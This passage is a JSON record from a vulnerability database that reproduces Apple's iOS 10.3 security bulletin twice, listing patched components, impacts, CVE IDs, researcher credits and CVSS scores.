generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's 